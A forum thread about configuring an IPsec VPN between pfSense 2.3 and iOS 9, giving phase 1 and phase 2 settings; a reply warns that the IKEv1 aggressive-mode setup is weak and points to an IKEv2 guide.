IPSec Between iOS 9 and PFSense 2.3: Working Configuration
-
It took me much to long to get this to work, and I am seeing a lot of questions here about this configuration. So I figured I will share my configuration here after I got it finally to work.
My setup: PFSense is connected directly to a cable modem. I will use "192.0.2.1" as my external IP below. For my internal NAT'ed network, I will use 10.10.10.0/24
PFSense Setup:
IPSec Mobile Clients
- Enable IPsec Mobile Client Support
- User Authentication: Local Database
- Group Authentication: None
- Provide a vritual IP address to the clients: checked
- Network configuration for Virtual Address Pool: 10.10.10.150/29 (essentially an unused subnet of my internal NATed subnet)
- Provide a virtual IPv6 address to clients: not checked
- Provide a list of accessible networks to clients: checked
- Allow clients to save Xauth passwords: checked
- Provide default domain name to clients: not checked
- Provide a list of split DNS domain names to clients: not checked
- Provide a DNS server list to clients: checked
- list your DNS servers (10.10.10.1 for mine)
- provide a WINS server list to clients: not checked
- provide a phase2 PFS group to clients: not checked
- provide a login banner to clients: checked. I use "VPN Login Success"
IPSec Tunnel (aka "Phase 1")
- Disabled: unchecked
- Key Exchange version: V1
- Internet Protocol: IPv4
- Interface: 192.0.2.1 (or whatever your "WAN" is)
- Description: empty
- Authentication Method: Mutual PSK + Xauth
- Negotiation Mode: Aggressive
- My Identifier: IP Address
- Peer Identifier: Distinguished name "myvpnusers"
- pre-shared key: <random preshared="" key="">- Encryption Algorithm: AES 256 bits
- Hash Algorithm: SHA1
- DH Group: 2 (1024 bit)
- Lifetime: 3600
- disable rekey: unchecked
- responder only: unchecked
- NAT Traversal: Auto
- Dead Peer Detection: checked
- Delay: 10
- Max failures: 5
Phase 2:
- Disabled: unchecked
- Mode: Tunnel IPv4
- Local Network: Network 0.0.0.0/0 (btw: I still only get traffic to 10.0.0.0/8 to the VPN…)
- NAT/BINAT: None
- Description: iOS
- Protocol: ESP
- Encryption Algorithms: AES 256 Bits (rest unchecked)
- Hash Algorithms: SHA1
- PFS key group: off
- Lifetime: 86400
For each user, configure a password, and add them to the VPN Users group .
The per-user IPSec Shared Secret is not used for PSK+Xauth authentication.on IOS:
Server: 192.0.2.1
Account: username
Password: user's password
Group Name: myvpnusers (same string as above under peer identifier)
Secret: shared IPSec secret. Same for all users.I hope this helps. will post some screen shots later.</random>
-
Thanks for sharing but I wouldn't recommend your configuration because you use IKEv1 in aggressive mode for key exchanging which isn't a really safe method nowadays.
Why didn't you just setup according to:
https://doc.pfsense.org/index.php/IKEv2_with_EAP-MSCHAPv2
It's safer, working and quicker in establishing a connection.
Youst send the certificate via email to your iPhone/iPad and you are good to go.
-
thats the next step. I was just happy to have this working for now.
-
BTW: I think a lot of the confusion on my site came from the fact that many of the guides (like the one you link to) are outdated not only on the PFSense site, but also on the iOS site. iOS seems to support AES256/SHA256/DH2048 just fine now.
-
Yes but the type of encryption can easily be tested after configuration in general and otherwise the article is up to date (and still working). But yes the article could be upgraded in respect of encryption.